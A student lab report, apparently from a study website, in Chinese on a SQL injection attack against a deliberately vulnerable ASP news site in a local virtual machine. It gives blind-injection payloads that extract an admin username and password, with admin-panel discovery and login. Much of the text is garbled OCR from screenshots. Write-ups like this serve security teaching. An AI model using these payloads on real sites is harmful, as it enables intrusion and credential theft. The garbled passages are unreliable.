SQL注入攻击实验报告x
时间:2020-10-12 12:48:52 来源:勤学考试网 本文已影响 人
实验报告
实验名称 : SQL 注入攻击)
一、 实验目的
通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加 强对Wet攻击的防范。
二、 实验环境
描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web服务器、客户机 等信息。
宿主机(客户机):操作系统为 Windows 10,IP为,在主机上安装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回 适配器,桥接模式,实现宿主机与虚拟机之间的网络通信,
虚拟机(Web服务器):操作系统为 Windows XP, IP为,
本实验利用windows的iis 服务搭建了一个有SQL注入漏洞的网站“ ASP新 闻发布系统”,以该网站为目标,对其实施 SQL注入攻击。
本实验所需工具如下:
IIS 是 In ternet In formation Server 的缩写,是微软提供的 In ternet 服务
器软 件,包括Web FTP Mail等服务器,也是目前常用的服务器软件。版本不限。
“啊 D'注入工具:对“ MSSQL显错模式”、“ MSSQL不显错模式”、
“ Access ”等数 据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫 描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。
“ ASP新闻发布系统” 0k3w源码。
三、 实验内容
(一)配置实验环境,
首先选择网络适配器,安装环回适配器,在主机上安装 VmwarePlayer,成功启
动虚拟机。接着配置宿主机和虚拟机的IP,如图
如鸭宓韵站M6,矗可咗取兰為詡鮒IP £&.逵删.你愛養从网 屯雋諭苗細也義晦电国酌pm
10 ?4出勺 I
子网?屮
要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge
甩豁身
甩豁身份验证共享
VMware Virtual Ethernet Adapter for VMnetB
5d^〔C}...
此连接便用下列環目Q】:
创Microsoft网角喜户M
^pVMware E ridgefrroto col
侧 丰训UlBUfl同雷』;紗4釉7印机共享
可j.穗路融5扑飆團应程序
叼 x Internet协议版本4仃匚P/1M4)
□ x Microsoft网晤适配器务菇传^器刃谀
词 铠踏剧5扑雄现玦卽器I/O驱动思序
Z?Microsoft LLDP确彊取动理囱
安装(N)十 卸議〔U)
然后,验证宿主机和虚拟机是否联通,结果显示连接成功。
licrosolt [|]J^-^. HX D. 105861
Cc) EiOlS fticrorolt CnTpnr讥inr.“嚟留虧,自枚#1 °
C:\V LHLUWS\sv3tem;iZ丹di^wi z;
C: \F IM1A.IS\3¥Ster?3Z>t]in£ LyL. Itt. IS. _1
~rpPing 192,163. IS. 11具有32字节的滋据: 13Q.
~rp
Ping 192,163. IS. 11具有32字节的滋据: 13Q. L68Llfl.ll 192. L68; 13.11 的凰宴:
192.. Ifil Ifl. 11 的硬:
1BQ. L68L 13.11 的El复:
字节=22 时|'Bj<Lnis 尹在監时I乐1ms 孚节=翌B?间叽昭 宇T=32时间€Lms
TTL=12R
HL=123
T7L=12B
TTL-123
的2 lb8* 13.11
的2 lb8* 13.11尉Pina统计恒即:
数据包:已发送=4.已騒 =4.丢失 肚返苗屋的洁计时囚⑼$秒为单位);
昙菲-Uns*脣甚=One,丰均-】ns
0 (ra丢失h
C; \fINDOVSK^eoSaMnc 19L lfi8.18. 9
手衣"冒I共百
手
衣"冒I
共百
Pins 192」矩18. 9具有32字节的数据:
192,168L 1S.9的冋真:字节=32吋 162. 16& 18.0 的
15Q. 163. L3.9 的
152. 153. :3.9的回复;宇节弓迂flj
|B]= ir;-' |Ej<liri: |C<1IH9
TTL=128
TTL=12£ TTL-:屈
TTL=123
192,16E. IS. 0 的 Ping 领计信息,:
数据赳:已发送二4,已接收二弘丢尖= 在返彳苯的估计时间似呈砂为学位):
畐坯二Oree,苣■弋=晁,辛內=Orc
C;\TimXj¥S\cvEtora33>
最后在虚拟机上安装IIS程序,打开浏览器,输入地址“”,检查网站搭建情况。
成功!
(二)寻找注入点
在宿主机上,打开网页id=95,可以正常打开页面。
O ? " - I32.16fl.149 in jj
刃衣弋同址诗4
,?才STF;^r+ ■ iT hURmbmyb 乓?
AEF宥工坟已痕轨佩E
新円帝无
冈幡窃宁同忻KfE |
|鬲牯富科|平
哥祠宾诅:詰內堀 阿培囲悴 囱矽 人和新目11畔轉 僻新可
进行注入测试,键入id=95 and仁1 ,返回页面不变
0 http^/191168,18^9/list^sp?id=9S^Cand^01=l
三HE
网站首页赫破冊1
刚帶安全网页討作
网姑远莒1
平百跚
耐賁讯 诂内啦I两皓和 冋詰鶴店I人删闻I业畀动态SMM4
键入id=95 and仁2,返回页面出错。
!屮jnv
!屮
*?* 4Rt*k
mirrjsiiwtM.i ?> iitiTRT
厂卿■制?
i码Fir胡己坤T磴.^.*HT-
irarCIknF^rtli:
.*4Hu|t10> t^iUin-
-ir幵?叮传■: w ^fen^r>
rntE in* 5K I? -内胡曲!■!?規-AZT Iff#
jpiT.” UCCiR
?*■? 'mTitt- a1
■ Z畀处
Kirrx-3?Ek IB 心* bv=n IMHvW Ffcipi?.>i7;和『?18曲1?出曲7 /IJm: K >3- fi
亠 ^Ki'i
MriiU^ 0 Ifiiim. IFT |Jd 0 相>n" fl测Mil馬妇 R IUfT■- iih-i- g』*加 DjHU 11 H JI.
Z J >r^r V D
? £y 电 a ■:*r Efc
因此,可确定该网站存在注入点。
判断数据库类型
用系统表的方法进行判断,分别键入
id=95 and (select coun t(*) from sysobjects)>0 id=95 and (select count(*) from msysobjects)>0
L勺 4- O 护丫倍网用于吉峙人知*胫工郢出.FX :
护丫倍网用于吉峙人知
*胫工郢
出.FX : ft JIT P*T4hl?{ ?J.EL^? JljH - IdOfl? 茶昨刖记天I t£ ?.^ = ^r = i上込口玄取甘财悴" /list ?E?. % IB fi
JbullVb.O ftiUMt Hl 10. Q. WR84)JmUiKllA3r? (lUOrt. l-.lt flcclr) 7hrTt/4?.O Efijl ZT 5^far:/5:F 36 ET 2. L &L品;L V
-屈:
fXT /Lint 叫
”时目:
'■'I -tEL-.M'Q I ? WJ
-Mtt:
‘I ?点““ £1出却*
!- 汀计厂:a n严 二.T .八 T. T卜乍 m" |l 1 I
? T亠 C
u * 直鮭 SRy ^fi
o Z1 {匕冉捡氏L:K确 18诧' -JT
3无昱蛊7票文 x 匚无理5埔员
兀窪且氏W歹
ii凹讥间F;两◎吃侗色可;±舁千
.绝占kJ射诩"纳洁虫直°
H打牛L:;川一」一?十百,¥氐音巧勺祐=疽配*映的仍梅-
xrr馆股锹Ltn -内:i ibA SR^ -刃當股
TL:xri.i.r三日军上
0 http7/1 g) 6B.1 &4/I lsLa5p?id>9S9h20and%d:L, .=l* l : ^20coun: . _」1 no nd
|tZOs^ubjeLh) a , |
卜7
心 I {fc?3ifcX?Ltflrit+ ?计尊<1国Jflisf 圍 无诂丘示叼氏
.单击肌証泗?麻*iJWifb
-fjw 辭.I验iR、主面"展后直越与所护朗碍
呦歸颈:Q0 -内宗眼石王i翫E -⑹淋
Eni?rn?lt: IS 身科彈
換卢肯息->.■
?错Q土:
fl. :i y=-; L t J£J D毗込也"£u£4"窕k;JUJM£」M
":-n,aft J.t曹彌命I坯找丁爭戒「曽It晋湎■叩”吋?吐[口 诵走它丄芒存坠 ⑺住它的名月耙州吕是些止墨口
ALflK ?it>j IK 临 fj
Hnnik^ o 鼻諒亠叭 mr io n:苗伸刊1〕^phVekKvr^P as QOCML 1讼E 'hdtii) 逊0. 2^3. 22 弘ftri,筠3F- 36 SB
Z. K Hala^r L.O
?网自.;
Ji£t /I i L E.
i ItH:!
羽I】心忆月咱.I再箔ze
-*轴却
H ■ ■: 3 1ST : ft 审站I
IB
两者返回均出错,可知是access数据库
猜测表名
一般网站后台的管理员都默认在表 admin中,我们先试一下,键入:
id=95 and (select coun t(*) from adm in)v>0
i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀” | Q hnp/<192.168.
i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀
Sit
幅;登亭主圧
幅;
登亭
主圧
返回页面正常,可知该网站后台数据库中存在着表名为 admin的表。
猜测字段名不同公司网站有不同的字段名, 但一般都有三个字段,分别记录ID
号、用户名和密码,常用的字段名为:id, username, password0
分别键入 id=95 and (select coun t(id) from adm in)v>0
id=95 and (select coun t(user name) from adm in)v>0
id=95 and (select coun t(password) from adm in)v>0
? http;Fig2_16BJ &g,li£t.agp "已=9占%2Darid%2[X2E4ct%20ccii^^^^^0frQ<n%JDB<jrni 巧==,戈* ▼
丄却厂无養二了网5t+ ) <rt£^ra?4^*> 鼾闫良T
丄却厂无養二了网
5t+ ) <rt£^ra?4^*> 鼾闫良T 立殆主_比
宣呈
re :KBQtram%2Cadi $ 右〒
.班
kJ K O W
AErMffijr柿茶塢w“
三者返回均正常。
可知,表 admin 中存在的三个字段:id,user name, password。
注:“username”的截图损坏,但是返回正常,望教员通融。
猜测管理员用户名和密码
确定表 admin 中有几条记录,键入 id=95 and (select count(*) from
admi n)=1返回页面正常。
可知,表admin只有一条记录。
猜测用户名长度,键入 id=95 and (select len(username) from admin)=1 返 回出错,继续键入 id=95 and (select len(username) from admin)=2 返回出错,
继 续 测 试 3/4/5… ,
Ofrt
Ofrt卜ft620admdn)= 1_土
砖笊氓尸下和悴作:
-中三竝1脚■戒血2車M
”打开:-:'V 1“日主百,埜后査找与用需诘尉貝关瞬溺"
KHI RSiSr 50: 102 -內SJIF哥吾&衣-应 口停
kJ K O W
嶠『稠区拭布丟蚯沁B
融百贞 計曲讯 刚址安全I期山窗作 何帖込誉 平向设计 皿缰蜃岸 遢小剧站
直到返回页面正确。测试到5的时候,返回正常。可知,用户名长度为 5
猜测用户名内容,采用ASCII码分析法先猜测第1位,用二分法,键入id=95 and (select coun t(*) from admin where (asc(mid(username,1,1)))betwee n 30 and 125)<>0 返回正确,进一步缩小范围 between 70 and 100 ,between 85 and 100 ,
between 90 and 100 ,=97。
.' rd%20($elect%20cou&20^rom%20adnir%2Cwhereetc(mid[use<na=
讦4H
U K 0 W
抽闻复卅束魏讽?&
刚站首页
1新冈资讯
齡安全
网页制作
网站运莒
平面跻
刚给缩程1
1演示魁
可知第一个字符为a。
依此类推,猜测之后的每一位字符,
0 tll620CelectM20tnuntt")站lOftcwn%?如dmin%20wh* reCasdnitKuaem ame^^ZiN=100) ?
汪护I
汪护
I询托SIH:
1? iJ%20Wect%20a)unU*用20ho*n%2gdmln
1
? iJ%20Wect%20a)unU*用20ho*n%2gdmln咄
nei^(aM(nrtidCijwm dtne^3)J) -1 D9f) ■= ><)| 9 1
卜?
分 可护胡 1
”会弓九口 帐是1
辽n栓养
<J K 0 W
枯fTt闻崔甲工竝小丄
r
1珈帧讯
昭天全1
刚矚惟1
| 1*4站运曲
| ¥曲诳计
1厲络编程|
1渣示1斓
耐百丙 号阈资讯 內培安士 同丙阴作 帕运营平面设计 竜示酣
匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *W
匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|
refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *
W 口 Ei国詢 1
I it珂籽粧
二金董也口 |巖E: 现
O KO VV
r
网站苔页
1龄迎于
1昭丙对作
平面诺卄1
1畸坊稈
沌示画拈
?評噺週常相乎轶T*
最后得到用户名为admin
4.猜测密码,同理:
id=95 and (select len( password) from adm in)=6
9 //19^16S J a J/l istasp? kl=95%2Qa nd%2O(5elect%ZQI
ln(pa $sw<j nd)%20frci m%20a drnin)=d
k佥▼
T^L匚士绘示两 I
|
BH-) x ? D W. m ” 二1 軒可 1*珀立抽?_酣一
网站首页新闻资讯
励络安全囲页制作网结运营丨平面谡计昭集程演示昭
所以密码为6位。
9 ;elect%20count(t)%20from%20admin%20where%20%2l(asc(mid(password/5/5))) = 53)<:>0|p_^ 庇□无法显示网
) L《计算机网路技术3课t 〔新闻塗讯—文章分类—我芳x
>会员入口 咪号:注册I站內搜索:
>会员入口 咪号:
注册
I站內搜索:
卜会员入口 帐号:二][登录I注册站內搜索:
卜会员入口 帐号:
二][登录I注册
站內搜索:
r
网站首页1
新闻资讯1
兩络安全
网页制作1
网站运营1
1平面设计
网络编程
演示网站
U KO W
ASP新闻发布茶统泌启
ASP新闻炭布系纸曲?&
T
网站首页1
新闻资讯1
网络安全1
网页制作
网站运营1
平面设计1
网络编程1
演示网玄
0 telect%20count(*)%20from%20admin%20where%20%^
|)(asc(m id(pas$word,4,4))) = 52)<>0|
导航C无法显示网
浒) C《计算机网增技术》课毛; 新闻资讯■文章分类■我扌x
? .elect%20count(*)%20from%20adm泊%2时恥%20%
b(asc(mid(pas$word;3;3))) = 51)<>0 卜
导航D无法显示网
I 1
>会员入口 帐号;密码;注册I站内搜索;浒) 《计算机网珞技术》课1 D新闻资讯_文章分类■我
>会员入口 帐号;
密码;
注册
I站内搜索;
kJ KO W
恥P新闻发布系统泌.6
网站首页
新闻资讯1
网络安全
网页制作
网站运营1
平面设计
网络编程
演示网站
?(elect%20counte)%20from%20admin%20where9620%3
Nasc( m 1 d (p-asswo rd, 2^2}))=50) <> d|
牙航0无法显丁网
《计算和网菇扌爻术》课'
D軒闻资讯_袁童分奨_耳匚
计)
卜合员入口帐号;厨;登录注册
卜合员入口
帐号;
厨;
登录
注册
I站内鹹
卜会员入口豐录注册I詁内攫素:
卜会员入口
豐录
注册
I詁内攫素:
恥F新闻按布系毓讥币
r
两站首页1新闻资讯
励络安全
刚页制作
囲站运营
平面设计1
囲络编程1
演示网站
0 ?lect%20count(!t)%20from%20admin%20where%2D%2}(asc(mid(passwrdJ1f1)))=49)<>0 {:
薪阖遥讯文直碌毎
匚朝+葺□网航郴溟i
U代0 W
临F新闻绘布系坊帆点
F
网站首页
新闻资讯
网络安全I
网页制作
网站运营
I平面设计
I网貉编程
演示网站
0 唱1 ect%20count(^)%20from%20admln%20where%20%20[ascfnnidfpasswordr^fi)))^^4)<>0
导航L-无法显示网
肝)D新豳饥却送我E?
肝)
卜会员入口帐号:蔭码:登录
卜会员入口
帐号:
蔭码:
登录
注册
詁內撰索:
F
网站百页
I新闻资讯I
博络安全
网页制作
刚站运营
I平面设计
I网络编程
演示网站
最终得到密码为6位:123456。
(七)寻找到后台管理窗口 打开“啊D'软件,点击进入“管理入口检测”选 项,点击“检测管理入口”,进行检测,
可弔连橫租日录应鬼' //IS? 1fiR 1R 9/i n*rA^:/经
可弔连橫租日录应鬼
' //IS? 1fiR 1R 9/i n*rA^:/
经http"阳2? 366. 16.9/1^;^
^ httu: ///.. Adnii>/LnlK. up
**hl:Lp:Z/T92- 1&9. IS.9/wiitLri/indiK up
网殆呦止 http; //192 166, 16.9/
柠涮删入口
如图:打开检测到的各网址,测试是否为管理入口
可知为管理入口,如图:
?ihif 竹2托馴阳」闻筍呻
■ D
卜 ■CLJHWE)?' 专?W2
(八)登陆后台 找到后台管理窗口,,用刚刚得到的用户 名和密码登陆,后台 登陆成功。
K t> - * ■
砸 胃TgVHPHTW 耐憎M脚CKIMQ 轟?r 簪 R 土
MKIhMMIt曲看&后台 冷皆氏醫頁i?|<<111章常上卩.匚?+匚::!去耳”4"%1_尢
MKIhMMIt
曲看&后台 冷皆氏醫頁
i?|<<
111章常上卩.匚?+匚::!去耳”4"%1_尢Et mu *世■ 一丄孙:箪
MB4i
U h N ? < 缢mur rb h 史缶章
H ■宿i
okh tJ i^E ■■
鳴屉:岂:
t>ti Ii/ab^- jri-jja. om/
KrfltKi
iku^J
■E
di — ri-
-flpWBBI
髯倉串:層 ue W 町 W^qsM t mn
H口伽巾沪#1 匚".[■■Tp^LpnzTl
?丄的丽1: X
CMETSf?*f|= K
种迈快阳4CTER;<
四、实验结果及分析
SQL注入攻击过程。
1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在 SQL 注入问题, 如:就是普通的网页访问。
只有对数据库进行动态查询的业务才可能存在 SQL注入,如:id=95,其中id = 95表示数据库查询变量,这种语句会在数据库中 执行,因此可能会给数据库带来威胁。
2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过 输入一 些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数据库 查询语句找到注入点。
3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度,以 及内容。这个过程可以通过网上大量注入工具快速实现, 并借助破解网站轻易破译用 户密码。
4) 寻找WEB管理后台入口。通常 WEBB台管理的界面不面向普通用户开放,要 寻找 到后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依次进行 尝试,就可以试出管理台的入口地址。
5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进行破坏行为,如篡 改网页、 上传木马、修改、泄漏用户信息等,并进一步入侵数据库服务器。
实验心得:
在实验的过程中遇到了很多困难, 配置上的, 环境上的, 还有一些需要注意的小 问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。
在整个实验中遇到的最大问题就是, 宿主机和虚拟机此前一直连不通, 通过宿主 机 ping 虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机才能 访问虚拟机上发布的网页。
可见,防火墙还是有一定作用的, 但是对于网站来说开通 了防火墙就没办法访问网页了。